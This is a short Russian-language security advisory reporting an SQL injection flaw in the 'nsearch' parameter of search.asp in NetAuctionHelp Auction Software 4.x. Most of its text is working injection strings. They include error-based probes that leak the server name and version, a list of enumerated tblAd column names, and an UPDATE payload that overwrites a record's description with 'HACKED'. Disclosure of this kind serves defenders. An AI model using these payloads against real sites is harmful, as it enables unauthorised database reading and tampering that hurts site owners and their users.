Программа: NetAuctionHelp Auction Software 4.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "nsearch" сценарием search.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch='having 1=1--
search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=1' or 1=convert(int,@@version)--
tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr
-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--
этот код с обновлением itemdetl.asp?id=1
